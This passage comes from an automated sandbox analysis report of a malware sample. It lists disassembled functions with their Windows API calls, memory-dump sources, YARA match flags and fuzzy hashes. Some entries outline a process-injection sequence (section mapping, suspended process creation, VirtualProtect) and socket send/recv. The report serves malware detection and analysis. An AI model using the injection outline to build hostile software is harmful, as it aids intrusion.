                                                                                                                                                                  • Part of subcall function 000730BE: GetProcAddress.KERNEL32(00000000,000C8568), ref: 000731DE
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Library$AddressProc$FreeLoad$DirectoryErrorLastSystemgetaddrinfo
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1170566393-0
                                                                                                                                                                • Opcode ID: e5d6019dc3854910c528021628cb72e7d7fad70a54e1dc82b9dfb210fc356ce4
                                                                                                                                                                • Instruction ID: bcf1041e42eec5073356b043d35650ad1b47b8d51cfeda2b3b6e37b1e0ce78a5
                                                                                                                                                                • Opcode Fuzzy Hash: e5d6019dc3854910c528021628cb72e7d7fad70a54e1dc82b9dfb210fc356ce4
                                                                                                                                                                • Instruction Fuzzy Hash: DBD012326015217AB25467596C05EBB9A9CDB967607014027B908D2151D7984E4182A6
                                                                                                                                                                Function 6FE9AA91 Relevance: 2.6, APIs: 2, Instructions: 67COMMONLIBRARYCODE
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • GetLastError.KERNEL32(-00000004,00000001,6FE987DD,6FE9887D,?,6FE980F4,00000000,00000000), ref: 6FE9AA95
                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 6FE9AB37
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorLast
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1452528299-0
                                                                                                                                                                • Opcode ID: 9ce8100ae2475fd4fa5753c91ee50970435b7c66ab1389c6a6c9b6f67101da11
                                                                                                                                                                • Instruction ID: 5e4d2ec0fb742d6a31a79c9ecb709e7f2a747e254d3f420cef60e1454afacd8e
                                                                                                                                                                • Opcode Fuzzy Hash: 9ce8100ae2475fd4fa5753c91ee50970435b7c66ab1389c6a6c9b6f67101da11
                                                                                                                                                                • Instruction Fuzzy Hash: B911E171A8A7106FDA101FF89EC5E1B2E69DF13ABC7700239F914952E1EF918D124270
                                                                                                                                                                Function 0007689B Relevance: 2.5, APIs: 2, Instructions: 18COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 00076447: GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 0007647F
                                                                                                                                                                  • Part of subcall function 00076447: GetProcAddress.KERNEL32(00000000), ref: 00076486
                                                                                                                                                                  • Part of subcall function 00076447: GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 00076497
                                                                                                                                                                  • Part of subcall function 00076447: GetProcAddress.KERNEL32(00000000), ref: 0007649E
                                                                                                                                                                  • Part of subcall function 00076447: GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 000764AF
                                                                                                                                                                  • Part of subcall function 00076447: GetProcAddress.KERNEL32(00000000), ref: 000764B6
                                                                                                                                                                  • Part of subcall function 00076447: GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 000764C7
                                                                                                                                                                  • Part of subcall function 00076447: GetProcAddress.KERNEL32(00000000), ref: 000764CE
                                                                                                                                                                  • Part of subcall function 00076447: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,0006421E), ref: 0007656E
                                                                                                                                                                  • Part of subcall function 00076447: VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 00076586
                                                                                                                                                                • CloseHandle.KERNEL32(0006421E,?,?,0006421E,000C2544), ref: 000768B1
                                                                                                                                                                • CloseHandle.KERNEL32(000C2544,?,?,0006421E,000C2544), ref: 000768BA
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Handle$AddressModuleProc$Close$AllocCreateProcessVirtual
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2948481953-0
                                                                                                                                                                • Opcode ID: e6fb296e694c9de75f10e462aa832efd80165a7e4a148c125885101d4713d854
                                                                                                                                                                • Instruction ID: 1edcf07198b04f4dc56f4b55d38fe65dd53ab13d90da623fc141cd1ed3ece94f
                                                                                                                                                                • Opcode Fuzzy Hash: e6fb296e694c9de75f10e462aa832efd80165a7e4a148c125885101d4713d854
                                                                                                                                                                • Instruction Fuzzy Hash: 49D0A776C4110E6FEF007BE4EC4A8EEBB7CFB05200B400661F825432129B7B58188A61
                                                                                                                                                                Function 02550123 Relevance: 1.7, APIs: 1, Instructions: 183libraryCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • LoadLibraryA.KERNEL32(?,?,00000000,?), ref: 025501C5
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4495447446.0000000002550000.00000040.00001000.00020000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_2550000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: LibraryLoad
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1029625771-0
                                                                                                                                                                • Opcode ID: 55d26a63db634c472364b674c926414e42fb2d9adb41b72ab935940c75f72a8a
                                                                                                                                                                • Instruction ID: 616806f2f795fc8ae9b0b2426eac5766c68bb8f94d4dfb2e04c6cb9776e3058d
                                                                                                                                                                • Opcode Fuzzy Hash: 55d26a63db634c472364b674c926414e42fb2d9adb41b72ab935940c75f72a8a
                                                                                                                                                                • Instruction Fuzzy Hash: 6D617435A00225DFDB24CF58C9A07B9BBB0FF48318F6944AADC4A9B391E731E945CB54
                                                                                                                                                                Function 6FE9BA25 Relevance: 1.6, APIs: 1, Instructions: 142COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • GetCPInfo.KERNEL32(FFFFF9B5,?,00000005,6FE9BC61,?), ref: 6FE9BA57
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Info
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1807457897-0
                                                                                                                                                                • Opcode ID: 79ac5b7a5aee119624ee7870946a3377b6f59000718cc865686bfb434d70c3aa
                                                                                                                                                                • Instruction ID: 9fd9c0ea7a0b66473ff34bdef7cd5b8323b97d63cdf6c1294707d51a0c9367d2
                                                                                                                                                                • Opcode Fuzzy Hash: 79ac5b7a5aee119624ee7870946a3377b6f59000718cc865686bfb434d70c3aa
                                                                                                                                                                • Instruction Fuzzy Hash: 6451F6B1D08158AADB118F68CD84BE9BFA9FF56308F2001E9D59887186D375AA85CB70
                                                                                                                                                                Function 00062B75 Relevance: 1.6, APIs: 1, Instructions: 89COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: H_prolog
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3519838083-0
                                                                                                                                                                • Opcode ID: cd0eb3994c8bd008d9a23688d75a3a0b9d15e76f7528c9983b63340eef898031
                                                                                                                                                                • Instruction ID: 32073135359276f2948e3953240b88bf5b41356057c12188220991d682f047ea
                                                                                                                                                                • Opcode Fuzzy Hash: cd0eb3994c8bd008d9a23688d75a3a0b9d15e76f7528c9983b63340eef898031
                                                                                                                                                                • Instruction Fuzzy Hash: C9217171B04509ABCB15FFB588966FEB7ABEF84320F104529F415EB282DF355E0187A1
                                                                                                                                                                Function 00062D46 Relevance: 1.6, APIs: 1, Instructions: 89COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: H_prolog
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3519838083-0
                                                                                                                                                                • Opcode ID: 921a7d86230c99c84749226ad4fdd7b3c1b5b4bbbf89fa15fb2fbf618dd149c0
                                                                                                                                                                • Instruction ID: 6023d8ed5731d8d1641b1ec4a67aafa4fcffb198c123dfeaacfa6375ecb59b18
                                                                                                                                                                • Opcode Fuzzy Hash: 921a7d86230c99c84749226ad4fdd7b3c1b5b4bbbf89fa15fb2fbf618dd149c0
                                                                                                                                                                • Instruction Fuzzy Hash: F321A171B00605ABCF14FFA9C896AFEB7ABAF85310F104129F415EB282DF355E0197A1
                                                                                                                                                                Function 02550320 Relevance: 1.6, APIs: 1, Instructions: 77memoryCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • VirtualProtect.KERNEL32(?,?,00000040,?), ref: 025503A3
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4495447446.0000000002550000.00000040.00001000.00020000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_2550000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                                • Opcode ID: 57c5b5104becd6d9dc66942e152c5083eadbbc544259d5cd2c708d68f60595ad
                                                                                                                                                                • Instruction ID: 3e8c979168462f68d5eab04a626101ada0f597066dce117460d788b0826ac07b
                                                                                                                                                                • Opcode Fuzzy Hash: 57c5b5104becd6d9dc66942e152c5083eadbbc544259d5cd2c708d68f60595ad
                                                                                                                                                                • Instruction Fuzzy Hash: EB21B036619616DBCB18CF9DD4A0AADBBB4FF49314F05429AEC4ADB341C370E985CB84
                                                                                                                                                                Function 000703DD Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 26cfe8e3a973c7e4c15f0e9eedfd9baeaef6fa04c7bc278cf98cf34126bfe647
                                                                                                                                                                • Instruction ID: 8892f2a4027a2665dfd8a835897b1ca0d45594b543cab6aa120dee167842f6c5
                                                                                                                                                                • Opcode Fuzzy Hash: 26cfe8e3a973c7e4c15f0e9eedfd9baeaef6fa04c7bc278cf98cf34126bfe647
                                                                                                                                                                • Instruction Fuzzy Hash: CD11EFB2B20105EFD7609E19C840A26B7AAEF51310F558398E609DB252DB75EC52C694
                                                                                                                                                                Function 6FE7D6D0 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • SetThreadStackGuarantee.KERNEL32(?), ref: 6FE7D70B
                                                                                                                                                                  • Part of subcall function 6FE4C770: HeapFree.KERNEL32(00000000,0000000C), ref: 6FE7A128
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FreeGuaranteeHeapStackThread
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 4181682901-0
                                                                                                                                                                • Opcode ID: 1bf274d5b2f435c6df848d0016b81872b81da02abfb7e4cc8e89ad5dd5d01282
                                                                                                                                                                • Instruction ID: 2babb90818476930331a98f0ce729831393179f0d8a3adebaf1f04af03f2c957
                                                                                                                                                                • Opcode Fuzzy Hash: 1bf274d5b2f435c6df848d0016b81872b81da02abfb7e4cc8e89ad5dd5d01282
                                                                                                                                                                • Instruction Fuzzy Hash: 9211ACB5D002089FCB10DF98D845BDEBFB8FB09724F104129E908A7380D336AA55CFA4
                                                                                                                                                                Function 6FE67730 Relevance: 1.5, APIs: 1, Instructions: 46memoryCOMMONLIBRARYCODE
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6FE51317), ref: 6FE67779
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                                • Opcode ID: 1e0eeb622614569cc192af6dddd4ffb70f559f627c7f94d2c63aca0149b699db
                                                                                                                                                                • Instruction ID: c07f4b09c03e7186aec7e3b22fe73bbbb49f2f70aa2642894fcedf34898b11e0
                                                                                                                                                                • Opcode Fuzzy Hash: 1e0eeb622614569cc192af6dddd4ffb70f559f627c7f94d2c63aca0149b699db
                                                                                                                                                                • Instruction Fuzzy Hash: 511145B49493068FC304DF28D184A1ABBF1BF89714F11896EF8999B350DB74EA44CF96
                                                                                                                                                                Function 00084ADB Relevance: 1.5, APIs: 1, Instructions: 44networkCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 00084BB3: recv.WS2_32(?,?,?,?), ref: 00084BBE
                                                                                                                                                                • WSAGetLastError.WS2_32 ref: 00084AFD
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorLastrecv
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2514157807-0
                                                                                                                                                                • Opcode ID: f2ed9efc29f8101d6ef1120ec222f35c5d439f01bd60f1326fd1fba732be379b
                                                                                                                                                                • Instruction ID: e15b10776b380165d2124998179bc0a317ad43d74e0dc8d1e3251df2f4b3f8ea
                                                                                                                                                                • Opcode Fuzzy Hash: f2ed9efc29f8101d6ef1120ec222f35c5d439f01bd60f1326fd1fba732be379b
                                                                                                                                                                • Instruction Fuzzy Hash: 0BF0623520C11A5EDF1CB999ECA5A7933C5FF49334B30436AFAB986AF1EB25D8502701
                                                                                                                                                                Function 6FE987EB Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000008,00000000,00000000,?,6FE9AADE,00000001,00000364,00000000,00000002,000000FF,?,6FE980F4,00000000,00000000), ref: 6FE9882C
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                                                • Opcode ID: 0c722ad3555e7698eea79dafa1afd7fa877e140b789094e63535134282dcf4a3
                                                                                                                                                                • Instruction ID: 09c03cafd106b45050000cbb4c3bc5990f962ec856038ebfed7eb92e25f36576
                                                                                                                                                                • Opcode Fuzzy Hash: 0c722ad3555e7698eea79dafa1afd7fa877e140b789094e63535134282dcf4a3
                                                                                                                                                                • Instruction Fuzzy Hash: 35F0B43264E6255AEB315B658800A9B3F48AF527B8BF04127AC14D62F0CB30E602C3F0
                                                                                                                                                                Function 000A0F74 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,000A3989,00000001,00000364,?,000A0866,00000001,00000001), ref: 000A0FB5
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                                                • Opcode ID: c25866964b6a2d6d6d61aa4e670fd49238fd7c187ff9ee8b3377f0e461a9ecb0
                                                                                                                                                                • Instruction ID: cd823adb235f45aa420ed7c465ecf7736b6a283ea5f0c37f1c5a543c3840c105
                                                                                                                                                                • Opcode Fuzzy Hash: c25866964b6a2d6d6d61aa4e670fd49238fd7c187ff9ee8b3377f0e461a9ecb0
                                                                                                                                                                • Instruction Fuzzy Hash: 3CF0BB3160512D6EEF715AE29C05B9B3788AF437A0B158131A808F6580CB71DC0182E1
                                                                                                                                                                Function 00084B4C Relevance: 1.5, APIs: 1, Instructions: 38networkCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 00084BCC: send.WS2_32(?,?,?,?), ref: 00084BD7
                                                                                                                                                                • WSAGetLastError.WS2_32 ref: 00084B6E
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorLastsend
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1802528911-0
                                                                                                                                                                • Opcode ID: 56a01c97fea5148d169d396be95ef90d72e0cb9545c730587fd84c0222672ff3
                                                                                                                                                                • Instruction ID: 89869af2ac74289879ab60062c563e9c63dae7504dd1f46eed828c0383960578
                                                                                                                                                                • Opcode Fuzzy Hash: 56a01c97fea5148d169d396be95ef90d72e0cb9545c730587fd84c0222672ff3
                                                                                                                                                                • Instruction Fuzzy Hash: 97F0B43520C1265ADF28B96DECA4A7C3785FF45330B30436AF6BA869F1EB25D8505311
                                                                                                                                                                Function 0008778D Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _memcmp
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2931989736-0
                                                                                                                                                                • Opcode ID: 6a880788fccffb7a6852245d2a4ab63d2dabddf777da5d8c624b978478869ea5
